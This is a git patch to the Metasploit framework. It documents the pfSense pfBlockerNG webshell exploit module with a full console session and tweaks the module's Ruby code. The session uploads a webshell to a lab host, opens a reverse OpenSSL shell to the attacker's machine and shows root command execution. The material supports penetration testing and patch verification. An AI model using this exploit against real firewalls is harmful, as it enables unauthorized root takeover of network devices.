From a3e32ffafa9ec2ba500d43eb342d7f0396afe3ab Mon Sep 17 00:00:00 2001 From: Grant Willcox Date: Wed, 12 Oct 2022 19:23:59 -0500 Subject: [PATCH] Add TARGET 0 to documentation --- .../unix/http/pfsense_pfblockerng_webshell.md | 63 +++++++++++++++++++ .../unix/http/pfsense_pfblockerng_webshell.rb | 4 +- 2 files changed, 65 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md index 03f99c2b96..761ba5d56e 100644 --- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md +++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md @@ -122,5 +122,68 @@ whoami root uname -a FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense amd64 +exit +msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set TARGET 0 +TARGET => 0 +msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options + +Module options (exploit/unix/http/pfsense_pfblockerng_webshell): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 172.23.40.111 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to + listen on all addresses. + SRVPORT 9933 yes The local port to listen on. + SSL true no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + WEBSHELL_NAME no The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse + t. + + +Payload options (cmd/unix/reverse_openssl): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 172.23.47.143 yes The listen address (an interface may be specified) + LPORT 4545 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Unix Command + + +msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run + +[*] Started reverse double SSL handler on 172.23.47.143:4545 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Uploading shell... +[*] Webshell name is: jIuhcpoe.php +[+] The target is vulnerable. +[*] Executing Unix Command for cmd/unix/reverse_openssl +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo XqZbye7zG7tGBVWc; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "XqZbye7zG7tGBVWc\n" +[*] Matching... +[*] A is input... +[+] Deleted /usr/local/www/jIuhcpoe.php +[*] Command shell session 2 opened (172.23.47.143:4545 -> 172.23.40.111:33941) at 2022-10-12 19:22:13 -0500 + +id +uid=0(root) gid=0(wheel) groups=0(wheel) +whoami +root ``` diff --git a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb index 45af603555..73093bd0f6 100644 --- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb +++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb @@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"), 'vars_post' => { - "#{@parameter_name}" => 'id' + @parameter_name.to_s => 'id' } ) return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)') @@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8' }, 'vars_post' => { - "#{@parameter_name}" => cmd + @parameter_name.to_s => cmd } }) end